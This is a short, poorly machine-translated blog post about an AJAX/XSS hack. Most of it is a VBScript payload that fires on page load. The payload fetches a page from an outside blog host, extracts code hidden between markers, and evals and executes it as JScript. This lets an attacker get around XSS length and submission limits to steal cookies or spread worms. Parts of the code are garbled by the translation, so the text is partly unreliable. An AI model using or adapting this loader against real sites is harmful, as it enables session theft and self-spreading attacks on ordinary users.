Today in the dream of the light of the blog saw an AJAX hack demonstration, in fact, across the station found very easy, but to do great harm or difficult, secretly cookies and what only for users, XSS worm that use is terrible.
Let's take a look at his VBScript script.
Copy Code code as follows:
Vbscript:execute ("
Dim L,s:
L=CHR (+CHR) (10):
S= "" Sub Mycode "" &l:
s=s& "Dim Http,url,pg,p,p2,cd,ht,o" "&l:
s=s& "" Url= "" "" Http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html "" "" "&l:
s=s& "" Set Http=createobject ("" "Microsoft.XMLHTTP" "" ")" "&l:
s=s& "" Http.open "" "" Get "" ", Url,false" "&l:
s=s& "" Http.send ("" "" "" ")" "&l:
s=s& "" Pg=http.responsetext "" &l:
s=s& "" "P=instr (1,PG," "" "Iloveuning-begin" "") "" &l:
s=s& "" If P=null or p<1 then Exit Sub "" &l:
s=s& "" P=instr (P,PG,CHR (Panax)) "" &l:
s=s& "" If P=null or p<1 then Exit Sub "" &l:
s=s& "" P2=instr (P,PG,CHR) "" &l:
s=s& "" Cd=mid (pg,p,p2-p) "" &l:
s=s& "" ht= "" "Eval (unescape ('" "" &cd& "" ")" "" "" &l:
s=s& "" "Window.execscript ht," "JScript" "" "" &l:
s=s& "" End Sub "" &l:
Execute (s):
Document.body.onload=getref ("" "Mycode"):
")
Calling code in http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
This is the realization of the site call code, change the train of thought, whether this solves the Ajax hack commonly used to submit data restrictions (outbound submissions do not have permissions, XSS code length restrictions), hehe ~ Here I did not experiment.
There is another idea is the sword-heart fragment write script and then eval out ~ These two ideas together, perhaps we can in the harsh XSS loopholes to create miracles!